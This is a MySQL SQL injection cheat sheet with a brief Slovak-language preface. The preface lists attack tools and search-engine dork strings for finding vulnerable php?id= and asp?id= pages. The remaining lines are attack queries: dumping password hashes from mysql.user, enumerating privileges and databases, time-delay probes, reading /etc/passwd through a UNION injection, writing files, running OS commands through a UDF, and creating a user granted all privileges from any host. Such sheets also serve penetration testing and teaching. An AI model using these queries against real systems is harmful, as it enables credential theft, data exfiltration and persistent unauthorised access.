-- GUI nástroje:
Havij
TyrantSQL - Treba Python 2.*.* + knižnice
SQL Power Injector
Vega
-- CMD nástroje:
SQLmap
Hashcat
-- Vyhľadávacie dopyty Google/Bing:
PHP/ASP + MySQL/MS SQL Server
php?id=
asp?id=
-- Version
SELECT @@version
-- Comments
SELECT 1; #comment
SELECT /*comment*/1;
-- Current User
SELECT user();
SELECT system_user();
-- List Users
SELECT user FROM mysql.user; -- priv
-- List Password Hashes
SELECT host, user, password FROM mysql.user; -- priv
-- Password Cracker
-- HashCat, John the Ripper will crack MySQL password hashes.
-- List Privileges
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;
-- list privs on databases (schemas)
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns
-- List DBA Accounts
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv
-- Current Database
SELECT database()
-- List Databases
SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db -- priv
-- List Columns
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
-- List Tables
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
-- Find Tables From Column Name
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username'
-- Select Nth Row
SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
-- Select Nth Char
SELECT substr('abcd', 3, 1); # returns c
-- Bitwise AND
SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0
-- ASCII Value -> Char
SELECT char(65); # returns A
-- Char -> ASCII Value
SELECT ascii('A'); # returns 65
-- Casting
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
-- String Concatenation
SELECT CONCAT('A','B'); #returns AB
SELECT CONCAT('A','B','C'); # returns ABC
-- If Statement
SELECT if(1=1,'foo','bar'); -- returns 'foo'
-- Case Statement
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
-- Avoiding Quotes
SELECT 0x414243; # returns ABC
-- Time Delay
SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(5); # >= 5.0.12
-- Make DNS Requests: no built-in MySQL function for this; believed not possible
-- Command Execution
If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.
-- Local File Access
…’ UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system
-- Hostname, IP Address
SELECT @@hostname;
-- Create Users
CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv
-- Delete Users
DROP USER test1; -- priv
-- Make User DBA
GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv
-- Location of DB files
SELECT @@datadir;
-- Default/System Databases
information_schema (>= mysql 5.0)
mysql